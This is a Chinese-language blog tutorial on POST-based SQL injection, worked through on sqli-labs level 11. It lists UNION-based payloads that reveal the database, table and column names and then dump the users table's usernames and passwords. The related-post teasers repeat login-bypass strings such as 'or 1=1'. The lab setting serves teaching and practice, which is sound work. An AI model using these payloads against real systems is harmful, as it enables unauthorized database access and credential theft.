SQL注入之post注入

于 2024-05-21 08:03:35 发布
阅读量633 收藏 8
点赞数 15
文章标签: 渗透 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/banliyaoguai/article/details/139079156
版权

目录

get传参和post传参区别

post注入

post注入实例

实验环境

实验步骤

1、输入1'出现报错语句,发现注入点

2、爆出列数

3、使用联合查询,爆出数库名

4、爆出表名

5、爆出列名

6、爆出数据

get传参和post传参区别

使用方式和数据传输方式:
GET请求通过URL的请求行来提交数据,这些数据在URL中是可见的。
POST请求通过HTTP请求体来传输数据,这些数据在URL中是不可见的。
请求长度限制:
GET请求的参数是通过URL传输的,而URL的长度往往被浏览器所限制,通常为2048个字符,因此GET请求的参数传输长度是被限制的。
POST请求的参数是存放在请求正文即request body中的,因此对数据类型没有限制,也允许二进制数据,没有明确的长度限制。
安全性:
GET请求的参数是明文传输的,因此不适合传输敏感信息,如密码等。
POST请求将参数放在请求体中,相对于GET请求更加安全,可以传输敏感信息。
缓存:
GET请求可以被缓存,因为GET请求是幂等的,即多次相同的GET请求对服务器的状态没有影响,可以使用缓存来提高性能。
POST请求不能被缓存,因为POST请求可能对服务器的状态产生影响,每次请求都需要重新向服务器获取最新的数据。
幂等性:
GET请求是幂等的,即多次相同的GET请求对服务器的状态没有影响,不会改变服务器的数据。
POST请求不是幂等的,多次相同的POST请求会对服务器的状态产生影响,可能会改变服务器的数据。

post注入

post注入是一种常见的网络攻击方式,其本质在于将用户输入的数据作为代码执行。这种攻击通常发生在用户通过POST请求提交数据时,如果程序没有对用户输入进行适当的过滤或验证,攻击者就可以通过在提交的数据中插入恶意注入来访问、修改或删除数据库中的数据。POST注入的高危点包括登录框、查询框以及任何与数据库有交互的表单。

post注入实例

实验环境

sql-lab第11关

实验步骤

1、输入1'出现报错语句,发现注入点

2、爆出列数

在使用order时候,发现使用第三行排序时会报错

3、使用联合查询,爆出数库名

注入语句:

-1' union select databane(),2#

4、爆出表名

注入语句:

-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#

5、爆出列名

注入语句:

-1' union select 1,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'#

6、爆出数据

注入语句:

-1' union select group_concat(username),group_concat(password) from users#

不嫌弃的点点关注,点点赞 ଘ(੭ˊᵕˋ)੭* ੈ✩‧₊˚

板栗妖怪
关注
  • 15
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入POST注入(一)
Mr.Huang_的博客
08-14 627
POST注入介绍 1.注入攻击的本质:   是把用户输入的数据当做代码执行。     这里有两个关键条件:       第一个是用户能够控制输入       第二个是原本程序要执行的代码,拼接了用户输入的数据 2.POST注入属于注入的一种:   POST注入就是使用POST进行传参的注入,本质上和GET类型的没什么区别   POST注入高危点:     登录框     查询框     等各种和数据库有交互的框   GET/POST   区别:   GET传参的数据有限,比较少   POST传参的数据可以比
POST注入
笔墨稠思
11-06 672
靶场地址 POST注入和GET注入几乎没有区别,只是GET注入在url上传参,而POST注入在FORM表单中传递参数。 首先,我们需要判断FORM表单是否存在sql注入: 这是一个登录表单,我采取了通用的登录方式 a’ or 1=1 发现登录成功,说明存在SQL注入 接下来我需要获取当前表的字段数来进行联合查询 用 order by 方法获取了当前表中有3个字段,之后判断回显点 通过联合查询 union select 1,2,3 发现先点为2,3两字段位置,接下来就可以查询我们想要的内容了 查
SQL-Post注入
最新发布
Code-5的博客
04-17 280
在登录过程中,输入用户名和密码,用户名和密码以表单的形式提交,提交到服务器后服务器再进行验证。这就是一次post的过程的。在输入正确的用户名和密码后显示尝试回显报错信息,输入admin'--+,回显报错了。尝试万能密码 admin’or’1’='1# ,成功登录并且回显信息。尝试联合注入显示数据库名了。
13、注入篇-- POST注入
WX公众号-小白学安全
04-05 1499
文章目录原理利用防范靶场 原理 利用 防范 靶场
SQL注入——POST类型
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-12 1918
SQL注入——POST类型 靶场地址 原理: POST注入就是利用post传参,用户提交数据与数据库进行交互,从数据库中提取有用的信息 第一题: 我们首先查看源码 它直接去运行了代码,没有做任何的处理,因此,我们只需要闭合username的前面的代码,再把后面代码注释掉就可以实现数据交互 我在账号框框里输入 ' or 1=1 # 直接显示 于是,我先来判断字段数 依次输入代码 'union select 1# 'union select 1,2# 'union select 1,2,3# 发现只有
post注入
quan9i的博客
01-04 5126
post注入(sql-lab11-18)
SQL注入--POST注入
weixin_52151447的博客
11-19 3634
post注入与get注入区别在于POST注入在传参时不
SQL注入思路详解
12-14
一、SQL注入可以分为三个步骤 1.识别Web应用与数据库交互的可能输入(识别潜在注入点) 2.SQL注入语句测试 3.根据服务器返回判定注入语句是否影响了SQL执行结果以判断是否存在SQL注入     2.识别Web应用与数据库...
sql注入 pikachu post数字型注入
08-12
sql注入 pikachu post数字型注入
Sql注入平台.zip
02-21
一个在本地搭建的SQL注入的平台,能够进行SQL注入,适用于GET和POST场景 包含了基于union查询的注入、基于报错的注入、基于floor的报错注入、基于boolean的盲注、基于时间的盲注……
php防止sql注入代码实例
12-18
放到公用调用文件(如conn数据库链接文件),对所有GET或POST的数据进行过滤特殊字符串,以实现简单有效的SQL注入过滤 复制代码 代码如下:Function inject_check($sql_str) { return eregi(‘select|insert|and|or|...
MYSQL POST注入详解
AaronLuo
09-01 3361
POST注入产生的原因 在登录处,用于判断用户名、密码使用select语句 在修改密码出,更新密码,使用到update语句 在商城系统中,订单的添加,删除,可能使用到insert,delete语句 HTTP之POST请求 HTTP报文分为三部分,分别为请求行,请求头,请求请求行:由请求方法字段、URL字段和HTTP协议版本字段3个字段组成 请求头:由关键字/值对组成,每行一对,关...
sql注入之GET/POST注入
热门推荐
qq_38135094的博客
04-02 1万+
针对不同数据库,语句有所不同,但是思路大致相同 第一步判断网站是否存在注入, 如 www.xxx.com/news.php?id=10 这个网址,使用and 1=1,and 1=2 判断是否存在注入 还需要判断数据库类型,在网址后面加上单引号,看报错情况,如果显示Microsoft JET Database错误,则是Access数据库,如果显示ODBC类型,则是MSSQL数据库 另
SQL注入---POST注入
zhoutong2323的博客
04-07 643
在Webshell文章中介绍过post提交和get提交的区别,这里不再赘述get方式提交URL中的参数信息,post方式则是将信息保存在HTTP请求的body中传递get提交的参数可以被缓存并保留在浏览器的历史记录里,post提交不。get提交最长2048个字符,而post提交没有长度限制综上所述,post方式提交的数据保密性更强,因此登录界面输入的账号密码信息常用post方式提交。
POST注入--万能密码(zkaq)
weixin_74410605的博客
07-12 937
入门简单的sql注入中的post注入,一键学万能密码
渗透测试:详解sqlmap进行POST注入、基于insert的注入(以vulnhub靶机LampSecurity:CTF7为例)
Bossfrank的博客
06-22 4486
本文以vulnhub靶机LampSecurity:CTF7为例,详解了insert(非select)类型的SQL注入方法,包含对报错注入函数updatexml的使用。同时还详解了使用sqlmap进行POST类型注入的方法。
sql注入--POST注入
pakho_C的博客
01-04 4328
sql注入POST注入 靶场:sqli-labs-master 下载链接:靶场下载链接 POST和GET的区别 GET提交的数据显示在URL中,POST则不。这是最显而易见的差别。这点意味着GET更不安全(POST也不安全,因为HTTP是明文传输抓包就能获取数据内容,要想安全还得加密) GET回退浏览器无害,POST再次提交请求(GET方法回退后浏览器再缓存中拿结果,POST每次都创建新资源) GET提交的数据大小有限制(是因为浏览器对URL的长度有限制,GET本身没有限制),POST没有 GET
SQL注入 - POST注入方法
HAKUNAMATATATTA的博客
08-30 735
SQL注入-POST注入方法教学
利用sqlmap进行post注入学习笔记
weixin_52034407的博客
03-19 2902
使用sqlmap进行post注入学习笔记
post请求SQL注入
03-10
我可以回答这个问题。Post请求SQL注入是一种常见的网络攻击方式,攻击者通过在Post请求注入恶意SQL语句,从而获取或篡改数据库中的数据。为了防止这种攻击,开发者需要对用户输入的数据进行严格的过滤和验证,确保输入的数据符合预期的格式和类型,同时使用参数化查询等安全措施来防止SQL注入攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值